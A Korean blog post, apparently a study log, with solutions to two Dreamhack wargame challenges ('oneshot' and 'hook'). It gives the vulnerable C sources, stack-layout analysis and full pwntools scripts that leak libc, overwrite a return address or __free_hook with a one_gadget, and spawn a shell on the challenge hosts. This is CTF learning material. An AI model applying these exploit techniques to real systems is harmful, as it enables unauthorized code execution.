TIL: oneshot, Hook Overwrite 🔫

Wargame: oneshot

문제의 소스 코드는 아래와 같다.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int main(int argc, char *argv[]) {
    char msg[16];
    size_t check = 0;

    initialize();

    printf("stdout: %p\n", stdout);

    printf("MSG: ");
    read(0, msg, 46);

    if(check > 0) {
        exit(0);
    }

    printf("MSG: %s\n", msg);
    memset(msg, 0, sizeof(msg));
    return 0;
}

Vulnerability scanning

• checksec

  

  canary가 적용되어 있지 않지만, 소스 코드 내의 check이 일종의 canary의 역할을 수행하고 있다.

• stdout의 주소가 노출된다. → one_gadget의 주소를 얻을 수 있다.
• MSG를 입력받는 부분에서 stack buffer overflow가 발생한다. 코드 마지막의 memset에 의해 msg 내의 값은 모두 0으로 지워지지만, buffer 밖으로 넘쳐난 값은 그대로 유지된다.

one_gadget 찾기

Stack frame 구조 파악하기

gdb를 이용해 stack frame의 구조를 파악하면 아래와 같이 stack이 구성되어 있음을 알 수 있다:

• msg -> 0x10 bytes
• dummy -> 0x8 bytes
• check -> 0x8 bytes
• sfp -> 0x8 bytes
• return address -> 0x8 bytes

Exploit

**main의 return address를 one_gadget의 주소로 overwrite한다.**

from pwn import *

p = remote("host3.dreamhack.games", 9713)
libc = ELF("./libc.so.6")

p.recvuntil("stdout: ")
libc_base = int(p.recvline()[:-1], 16) - libc.symbols["_IO_2_1_stdout_"]
og = libc_base + 0x4526a

p.recvuntil("MSG: ")
payload = b"A"*(0x10 + 0x8)
payload += p64(0) # check이 0인지 검사하는 코드를 bypass하기 위함
payload += b"A"*0x8
payload += p64(og)
p.sendline(payload)

p.interactive()

• 주의할 점으로, libc_base를 구할 때 빼주는 값을 libc.symbols["stdout"]로 입력하면 안된다. gdb를 통해 정확한 이름을 확인하면 "_IO_2_1_stdout_"이 사용되고 있음을 알 수 있다.

Wargame: hook

문제의 소스 코드는 아래와 같다.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int main(int argc, char *argv[]) {
    long *ptr;
    size_t size;

    initialize();

    printf("stdout: %p\n", stdout);

    printf("Size: ");
    scanf("%ld", &size);

    ptr = malloc(size);

    printf("Data: ");
    read(0, ptr, size);

    *(long *)*ptr = *(ptr+1);

    free(ptr);
    free(ptr);

    system("/bin/sh");
    return 0;
}

Vulnerability scanning

• checksec

  

• stdout의 주소가 노출된다.
• *(long *)*ptr = *(ptr+1); → malloc으로 할당된 메모리의 첫 번째 8 byte에 적혀 있는 부분의 주소로 두 번째 8 byte에 적혀 있는 값을 작성한다. ⇒ 원하는 주소에 원하는 8 byte의 값을 작성할 수 있다. (key point)
• 프로그램의 마지막에 system("/bin/sh")가 있다. 일반적인 프로그램의 흐름으로는 free가 두 번 실행되며 error가 발생하기 때문에 실제로는 실행되지 않는다.

Exploit

one_gadget 찾는 과정은 위와 동일하다.

from pwn import *

p = remote("host3.dreamhack.games", 21497)
libc = ELF("./libc.so.6")

p.recvuntil("stdout: ")
libc_base = int(p.recvline()[:-1], 16) - libc.symbols["_IO_2_1_stdout_"]
free_hook = libc_base + libc.symbols["__free_hook"]
og = libc_base + 0x4f302

p.recvuntil("Size: ")
p.sendline("16")

p.recvuntil("Data: ")
payload = p64(free_hook) + p64(og)
p.sendline(payload)

p.interactive()

• 위 풀이에서는 free_hook을 og로 overwrite했지만, free_hook을 그냥 ret하는 gadget으로 overwrite하여 프로그램 마지막에 있는 system("/bin/sh")이 실행되도록 할 수도 있다. 그냥 ROPgadget으로 ret하는 gadget의 주소를 찾고, 이 주소로 free_hook을 overwrite하기만 하면 된다.